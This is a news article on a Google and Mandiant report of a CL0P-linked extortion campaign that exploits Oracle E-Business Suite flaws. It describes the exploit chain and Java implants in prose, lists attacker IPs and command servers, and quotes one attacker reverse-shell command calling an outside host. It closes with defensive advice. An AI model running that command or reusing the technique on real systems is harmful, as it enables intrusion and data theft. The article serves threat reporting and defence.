Google reports 'mass amounts of customer data' exploited in extortion campaign

Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion scheme. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group.

Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to light. The extortion campaign has resulted in the theft of large volumes of customer data. They said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion brand.

Google and Mandiant reveal zero-day exploitation 

According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. 

The emails, sent from hundreds of compromised third-party accounts, included contact addresses, support@pubstorm.com and support@pubstorm.net, previously linked to the CL0P data leak site.

Google and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as CVE-2025-61882. In some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected organizations.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent compromise.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. It has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion FTA. Those campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks later. 

At the time of the report, no new victims from this incident had appeared on CL0P’s data leak site. 

Complex, multi-stage Java implants

Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants.

In July 2025 there was suspicious activity that involved HTTP requests to /OA_HTML/configurator/UiServlet. This suspicious activity was observed in another exploit that later surfaced in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.” 

The leaked exploit made use of several advanced techniques to gain control over targeted servers, such as a server-side request forgery (SSRF), an authentication bypass, and a XSL template injection.

By August 2025, the attackers began using another tool called SyncServlet to make and run harmful templates inside the EBS database. These templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory. 

Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further exploitation.

After breaching the system, the attackers used the EBS account “applmgr” to explore the system, collect network and system details, and then install more malicious files. The attackers also used shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the GOLDVEIN.JAVA payload.

GTIG has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft operations. 

Mandiant also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related attacks.

Users are urged to be suspicious of EBS database tables XDO_TEMPLATES_B and XDO_LOBS, especially those with names beginning with “TMP” or “DEF”, and to block external internet traffic from EBS servers to prevent more data extortion.

The organizations also recommend close monitoring of HTTP requests to endpoints like /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java payloads.

Google warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day exploits.

If you're reading this, you’re already ahead. Stay there with our newsletter.